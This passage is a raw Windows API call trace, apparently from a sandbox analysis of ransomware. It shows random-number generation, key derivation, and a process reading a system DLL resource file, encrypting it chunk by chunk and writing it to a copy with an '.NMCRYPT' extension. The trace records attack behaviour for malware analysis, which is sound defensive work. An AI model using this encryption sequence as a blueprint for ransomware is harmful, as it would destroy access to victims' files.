hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.092] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.093] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.093] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.093] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0159.093] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.093] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad4b8) returned 1 [0159.093] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.093] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.093] wcslen (_String="\\\\?\\") returned 0x4 [0159.094] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad6b8) returned 1 [0159.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.094] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=7680) returned 1 [0159.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.096] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.096] GetLastError () returned 0x0 [0159.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.097] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.098] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.098] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.098] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.098] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.099] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.099] GetLastError () returned 0x0 [0159.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.100] GetLastError () returned 0x0 [0159.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.100] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, 